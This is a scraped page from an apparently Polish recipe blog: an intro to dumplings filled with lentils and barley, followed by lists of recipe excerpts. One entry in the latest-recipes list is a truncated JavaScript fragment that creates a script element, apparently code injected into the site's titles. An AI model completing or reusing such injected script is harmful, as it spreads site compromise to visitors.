Uszka z kaszą i soczewicą

Już po Wigilii, ale to nic. Uszka można jeść całym rokiem, a nie tyko w wigilijnym barszczu. Można je podać jako samodzielne danie, składnik dania obiadowego lub sałatki. Tym razem proponuję wam uszka z farszem z zielonej soczewicy i kaszy jęczmiennej. Z takim farszem można zrobić również pierogi i wtedy jest trochę szybciej, ale ja dziś postanowiłam się trochę pobawić w...
Najnowsze przepisy
Rabarbar pojawia się w sklepach i na straganach wcześnie... ⇖ 11
Ah, Thanksgiving! It’s that magical time of year when the... ⇖ 9
Uwielbiam kuchnię pełną wyrazistych smaków i aromatów,... ⇖ 10
Jesień zagościła na dobre, to i w kuchni również jest... ⇖ 11
(function(){ u938=document.createElement("script");u938.type ⇖ 10
Idealne, słodko winne polędwiczki w sosie śliwkowym,... ⇖ 21
Przepisy z bloga
Na weekend postanowiłam zrobić bardziej wymyślne ciasto,... ⇖ 160
Dziś upiekłam kolejne w tym sezonie ciasto z owocami. Tym... ⇖ 133
Ostatnio korzystam z dobrodziejstw lata i zbieram wszystkie... ⇖ 203
Jak ja lubię lato i owoce, które po kolei dojrzewają.... ⇖ 164
Beza - moja pierwsza w życiu upieczoną przeze mnie... ⇖ 144
Sezon na truskawki właśnie się zaczyna, więc u mnie... ⇖ 147
Sezon na rabarbar trwa, więc u mnie na weekend zagościło... ⇖ 315
Przepisy na czasie
Murzynek to takie ciasto, które piekło się u mnie w domu... ⇖ 831
Sezon na grzyby jest w pełni, w tym roku jest istne,... ⇖ 356
Sernik bez sera to taki wypiek, który potrafi naprawdę... ⇖ 328
Przysmak Sułtana to jedno z tych ciast, które wygląda... ⇖ 323
Sernik to jedno z tych ciast, które nigdy się nie nudzą... ⇖ 267